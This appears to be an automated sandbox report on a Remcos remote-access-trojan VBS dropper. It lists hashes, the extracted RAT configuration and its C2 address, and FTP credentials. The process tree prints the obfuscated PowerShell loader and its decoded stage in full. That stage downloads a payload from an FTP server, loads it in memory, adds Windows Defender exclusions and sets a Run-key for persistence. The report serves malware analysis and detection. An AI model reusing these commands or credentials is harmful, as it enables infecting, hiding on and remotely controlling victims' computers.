remcos | d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs
Size

681KB
MD5

8dbb7515d5a60561c6274dc9727f0153
SHA1

ff42190854208b6a0584542d7ab7319eac4860e2
SHA256

d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9
SHA512

acd73dfc1152bf6d9e0d85832c73765f09e6e23b085ba1a3fa12016a02e6c13fe0a8483a1ac8a1528f91d7d85b9b58a5834f11a8ec13020a589421c934bd2e12
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222m:r0iH2GgF+

Score

10^/10

remcos grace defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

remcos

Botnet

Grace

severdops.ddns.net:7717

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-P28XIL
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 7 IoCs

flow	pid	Process
6	4352	powershell.exe
27	4352	powershell.exe
31	4352	powershell.exe
33	4352	powershell.exe
35	4352	powershell.exe
37	4352	powershell.exe
39	3412	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2848	powershell.exe
1096	powershell.exe
1240	powershell.exe
3412	powershell.exe
392	powershell.exe
4352	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ngl = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\tktic.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
38	pastebin.com
39	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3412 set thread context of 3364	3412	powershell.exe	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
392	powershell.exe
392	powershell.exe
4352	powershell.exe
4352	powershell.exe
4352	powershell.exe
2848	powershell.exe
1096	powershell.exe
1096	powershell.exe
1096	powershell.exe
2848	powershell.exe
1240	powershell.exe
1240	powershell.exe
3412	powershell.exe
3412	powershell.exe
3412	powershell.exe
3412	powershell.exe
3412	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3364	RegAsm.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3560 wrote to memory of 392	3560	WScript.exe	84
PID 3560 wrote to memory of 392	3560	WScript.exe	84
PID 392 wrote to memory of 4352	392	powershell.exe	86
PID 392 wrote to memory of 4352	392	powershell.exe	86
PID 4352 wrote to memory of 2848	4352	powershell.exe	94
PID 4352 wrote to memory of 2848	4352	powershell.exe	94
PID 4352 wrote to memory of 1096	4352	powershell.exe	95
PID 4352 wrote to memory of 1096	4352	powershell.exe	95
PID 4352 wrote to memory of 4652	4352	powershell.exe	96
PID 4352 wrote to memory of 4652	4352	powershell.exe	96
PID 4352 wrote to memory of 1240	4352	powershell.exe	97
PID 4352 wrote to memory of 1240	4352	powershell.exe	97
PID 4352 wrote to memory of 3412	4352	powershell.exe	99
PID 4352 wrote to memory of 3412	4352	powershell.exe	99
PID 4352 wrote to memory of 1108	4352	powershell.exe	100
PID 4352 wrote to memory of 1108	4352	powershell.exe	100
PID 3412 wrote to memory of 1700	3412	powershell.exe	102
PID 3412 wrote to memory of 1700	3412	powershell.exe	102
PID 3412 wrote to memory of 1700	3412	powershell.exe	102
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103
PID 3412 wrote to memory of 3364	3412	powershell.exe	103

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBlЌз革HYЌз革aQByЌз革HQЌз革dQBhЌз革GwЌз革cwBlЌз革HIЌз革dgBpЌз革GMЌз革ZQBzЌз革HIЌз革ZQB2Ќз革GkЌз革ZQB3Ќз革HMЌз革LgBjЌз革G8Ќз革bQЌз革vЌз革HMЌз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革RgBTЌз革HUЌз革dgB3Ќз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BGЌз革FMЌз革dQB2Ќз革HcЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革GIЌз革YgB4Ќз革GsЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革YgBiЌз革HgЌз革awЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GkЌз革TQBvЌз革GEЌз革SQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革GkЌз革TQBvЌз革GEЌз革SQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAAYQBKAG4AVQBpACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAAYQBKAG4AVQBpACQAIAA7AA==';$txJSA = $qKKzc.replace('Ќз革' , 'A') ;$oXODH = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $txJSA ) ); $oXODH = $oXODH[-1..-$oXODH.Length] -join '';$oXODH = $oXODH.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs');powershell $oXODH
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $iUnJa = $host.Version.Major.Equals(2) ;if ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = (New-Object Net.WebClient);$IaoMi.Encoding = [System.Text.Encoding]::UTF8;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$kxbb = (New-Object Net.WebClient);$kxbb.Encoding = [System.Text.Encoding]::UTF8;$kxbb.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $kxbb.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$kxbb.dispose();$kxbb = (New-Object Net.WebClient);$kxbb.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $kxbb.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs';[Byte[]] $wvuSF = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $wvuSF ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.s/moc.sweiversecivreslautrive//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1096
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:4652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
